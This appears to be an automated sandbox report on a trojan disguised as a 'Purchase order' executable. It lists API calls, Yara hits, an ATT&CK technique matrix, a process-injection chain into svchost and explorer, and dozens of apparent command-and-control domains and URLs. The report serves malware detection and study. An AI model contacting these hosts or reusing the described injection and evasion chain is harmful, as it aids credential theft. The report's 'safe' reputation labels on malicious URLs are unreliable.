          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_00472C3F GetUserNameW
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary

          Stealing of Sensitive Information

          Source: Yara match  File source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match  File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match  File source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE
          Source: Yara match  File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match  File source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Purchase order MIPO2425110032.exe  Binary or memory string: WIN_XP
          Source: Purchase order MIPO2425110032.exe  Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
          Source: Purchase order MIPO2425110032.exe  Binary or memory string: WIN_XPe
          Source: Purchase order MIPO2425110032.exe  Binary or memory string: WIN_VISTA
          Source: Purchase order MIPO2425110032.exe  Binary or memory string: WIN_7
          Source: Purchase order MIPO2425110032.exe  Binary or memory string: WIN_8

          Remote Access Functionality

          Source: Yara match  File source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match  File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match  File source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE
          Source: Yara match  File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match  File source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe  Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
          MITRE ATT&CK matrix, listed by tactic (the figure in parentheses is the signature count the report shows next to that technique):

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
          Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
          Execution: Native API (2); Shared Modules (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
          Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
          Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (612); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
          Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Rootkit (1); Valid Accounts (2); Virtualization/Sandbox Evasion (12); Access Token Manipulation (21); Process Injection (612); Dynamic API Resolution
          Credential Access: Credential API Hooking (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
          Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (26); Security Software Discovery (241); Virtualization/Sandbox Evasion (12); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1); System Network Configuration Discovery (1)
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
          Collection: Archive Collected Data (1); Credential API Hooking (1); Input Capture (21); Clipboard Data (3); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
          Command and Control: Ingress Tool Transfer (2); Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
          Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 1548508
Sample: Purchase order  MIPO2425110...
Startdate: 04/11/2024
Architecture: WINDOWS
Score: 100

• Start → Purchase order  MIPO2425110032.exe (started)
  Contacts: www.6282.xyz; www.sfmoreservicesllc.lat; 4 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
  www.6282.xyz: Performs DNS queries to domains with low reputation
• Purchase order  MIPO2425110032.exe → svchost.exe (started)
  Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
• svchost.exe → ipconfig.exe (started); → explorer.exe (injected)
  Signatures: Uses ipconfig to lookup or modify the Windows network settings; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; 4 other signatures
• ipconfig.exe → cmd.exe (started)
  Signatures: Modifies the context of a thread in another process (thread injection); Reads the DNS cache; Maps a DLL or memory area into another process; 2 other signatures
• explorer.exe → www.6282.xyz 156.235.1.30, 49943, 80 CNSERVERSUS Seychelles; → autochk.exe (started)
  Signatures: System process connects to network (likely due to code injection or exploit)
• cmd.exe → conhost.exe (started)

Source | Detection | Scanner | Label | Link
Purchase order MIPO2425110032.exe | 21% | ReversingLabs | Win32.Trojan.AutoitInject |
Purchase order MIPO2425110032.exe | 100% | Avira | HEUR/AGEN.1321665 |
Purchase order MIPO2425110032.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.lasterdeals.shopReferer: | 0% | Avira URL Cloud | safe |
http://www.6282.xyz/ge07/?VN9H=FOymHjEy8INtRP80ztKDHy+SkTRNuxtAsSGbgkPqAuR0sH6nXW9AVXeVOt+ErvTzet/o&H0Gx7d=DzrdohnPa4vXCBq | 0% | Avira URL Cloud | safe |
http://www.g18q11a.topReferer: | 0% | Avira URL Cloud | safe |
http://www.giyztm.xyz/ge07/www.oal-ahzgwo.xyz | 0% | Avira URL Cloud | safe |
http://www.wner-nyquh.xyz/ge07/ | 0% | Avira URL Cloud | safe |
http://www.ostcanadantpl.top/ge07/ | 0% | Avira URL Cloud | safe |
http://www.zoc-marriage.xyz | 0% | Avira URL Cloud | safe |
http://www.dvle-father.xyz/ge07/www.f7y2i9fgm.xyz | 0% | Avira URL Cloud | safe |
http://www.lasterdeals.shop/ge07/ | 0% | Avira URL Cloud | safe |
http://www.ecurityemployment.today/ge07/www.wner-nyquh.xyz | 0% | Avira URL Cloud | safe |
http://www.sfmoreservicesllc.lat/ge07/www.6282.xyz | 0% | Avira URL Cloud | safe |
http://www.rowadservepros.net/ge07/www.dvle-father.xyz | 0% | Avira URL Cloud | safe |
http://www.f7y2i9fgm.xyz/ge07/www.giyztm.xyz | 0% | Avira URL Cloud | safe |
http://www.f7y2i9fgm.xyz | 0% | Avira URL Cloud | safe |
http://www.sfmoreservicesllc.lat | 0% | Avira URL Cloud | safe |
http://www.6282.xyzReferer: | 0% | Avira URL Cloud | safe |
http://www.6282.xyz | 0% | Avira URL Cloud | safe |
http://www.sfmoreservicesllc.lat/ge07/ | 0% | Avira URL Cloud | safe |
http://www.dvle-father.xyzReferer: | 0% | Avira URL Cloud | safe |
http://www.rowadservepros.net/ge07/ | 0% | Avira URL Cloud | safe |
http://www.dvle-father.xyz | 0% | Avira URL Cloud | safe |
http://www.ostcanadantpl.topReferer: | 0% | Avira URL Cloud | safe |
http://www.wner-nyquh.xyz/ge07/www.lasterdeals.shop | 0% | Avira URL Cloud | safe |
http://www.rowadservepros.net | 0% | Avira URL Cloud | safe |
http://www.f7y2i9fgm.xyzReferer: | 0% | Avira URL Cloud | safe |
http://www.ecurityemployment.todayReferer: | 0% | Avira URL Cloud | safe |
http://www.epehr.pics | 0% | Avira URL Cloud | safe |
http://www.oal-ahzgwo.xyz/ge07/ | 0% | Avira URL Cloud | safe |
http://www.ostcanadantpl.top | 0% | Avira URL Cloud | safe |
http://www.ecurityemployment.today/ge07/ | 0% | Avira URL Cloud | safe |
http://www.g18q11a.top | 0% | Avira URL Cloud | safe |
http://www.rkgexg.top | 0% | Avira URL Cloud | safe |
http://www.rkgexg.top/ge07/ | 0% | Avira URL Cloud | safe |
http://www.wner-nyquh.xyzReferer: | 0% | Avira URL Cloud | safe |
http://www.epehr.pics/ge07/ | 0% | Avira URL Cloud | safe |
http://www.lasterdeals.shop/ge07/www.zoc-marriage.xyz | 0% | Avira URL Cloud | safe |
http://www.dvle-father.xyz/ge07/ | 0% | Avira URL Cloud | safe |
http://www.g18q11a.top/ge07/ | 0% | Avira URL Cloud | safe |
http://www.6282.xyz/ge07/ | 0% | Avira URL Cloud | safe |
http://www.lasterdeals.shop | 0% | Avira URL Cloud | safe |
http://www.oal-ahzgwo.xyz/ge07/www.epehr.pics | 0% | Avira URL Cloud | safe |
http://www.rkgexg.top/ge07/www.9net88.net | 0% | Avira URL Cloud | safe |
http://www.oal-ahzgwo.xyzReferer: | 0% | Avira URL Cloud | safe |
http://www.9net88.net/ge07/www.ecurityemployment.today | 0% | Avira URL Cloud | safe |
http://www.rowadservepros.netReferer: | 0% | Avira URL Cloud | safe |
http://www.wner-nyquh.xyz | 0% | Avira URL Cloud | safe |
http://www.sfmoreservicesllc.latReferer: | 0% | Avira URL Cloud | safe |
http://www.6282.xyz/ge07/www.ostcanadantpl.top | 0% | Avira URL Cloud | safe |
http://www.ostcanadantpl.top/ge07/www.rkgexg.top | 0% | Avira URL Cloud | safe |
http://www.g18q11a.top/ge07/www.rowadservepros.net | 0% | Avira URL Cloud | safe |
http://www.zoc-marriage.xyzReferer: | 0% | Avira URL Cloud | safe |
http://www.zoc-marriage.xyz/ge07/www.g18q11a.top | 0% | Avira URL Cloud | safe |
http://www.f7y2i9fgm.xyz/ge07/ | 0% | Avira URL Cloud | safe |
http://www.epehr.picsReferer: | 0% | Avira URL Cloud | safe |
http://www.oal-ahzgwo.xyz | 0% | Avira URL Cloud | safe |
http://www.rkgexg.topReferer: | 0% | Avira URL Cloud | safe |
http://www.ecurityemployment.today | 0% | Avira URL Cloud | safe |
http://www.zoc-marriage.xyz/ge07/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
94950.bodis.com | 199.59.243.227 | true | true | | unknown
www.6282.xyz | 156.235.1.30 | true | true | | unknown
www.rkgexg.top | unknown | unknown | true | | unknown
www.sfmoreservicesllc.lat | unknown | unknown | true | | unknown
www.ostcanadantpl.top | unknown | unknown | true | | unknown
www.9net88.net | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.6282.xyz/ge07/?VN9H=FOymHjEy8INtRP80ztKDHy+SkTRNuxtAsSGbgkPqAuR0sH6nXW9AVXeVOt+ErvTzet/o&H0Gx7d=DzrdohnPa4vXCBq | true | Avira URL Cloud: safe | unknown
www.9net88.net/ge07/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://word.office.comon | explorer.exe, 00000003.00000002.3291923932.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.giyztm.xyz/ge07/www.oal-ahzgwo.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.g18q11a.topReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lasterdeals.shopReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.dvle-father.xyz/ge07/www.f7y2i9fgm.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.9net88.netReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.wner-nyquh.xyz/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://powerpoint.office.comcember | explorer.exe, 00000003.00000000.2061373249.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3296359647.000000000C460000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.ostcanadantpl.top/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lasterdeals.shop/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ecurityemployment.today/ge07/www.wner-nyquh.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 00000003.00000000.2059543443.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3292694913.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.zoc-marriage.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.micro | explorer.exe, 00000003.00000000.2059075313.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3290832822.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2059048265.0000000008870000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.f7y2i9fgm.xyz/ge07/www.giyztm.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sfmoreservicesllc.lat/ge07/www.6282.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rowadservepros.net/ge07/www.dvle-father.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sfmoreservicesllc.lat | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.giyztm.xyz/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.6282.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.6282.xyzReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.9net88.net/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.sfmoreservicesllc.lat/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.f7y2i9fgm.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rowadservepros.net/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.giyztm.xyzReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.dvle-father.xyzReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rowadservepros.net | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wner-nyquh.xyz/ge07/www.lasterdeals.shop | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ostcanadantpl.topReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.dvle-father.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000003.00000002.3296660560.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2061373249.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3098294743.000000000C513000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.giyztm.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.ecurityemployment.todayReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.epehr.pics | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.f7y2i9fgm.xyzReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.oal-ahzgwo.xyz/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wns.windows.com/)s | explorer.exe, 00000003.00000002.3291923932.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.ostcanadantpl.top | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000003.00000002.3297093239.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2061877271.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095137510.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2061877271.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.ecurityemployment.today/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.g18q11a.top | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rkgexg.top | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rkgexg.top/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wner-nyquh.xyzReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.dvle-father.xyz/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.epehr.pics/ge07/ | explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lasterdeals.shop/ge07/www.zoc-marriage.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
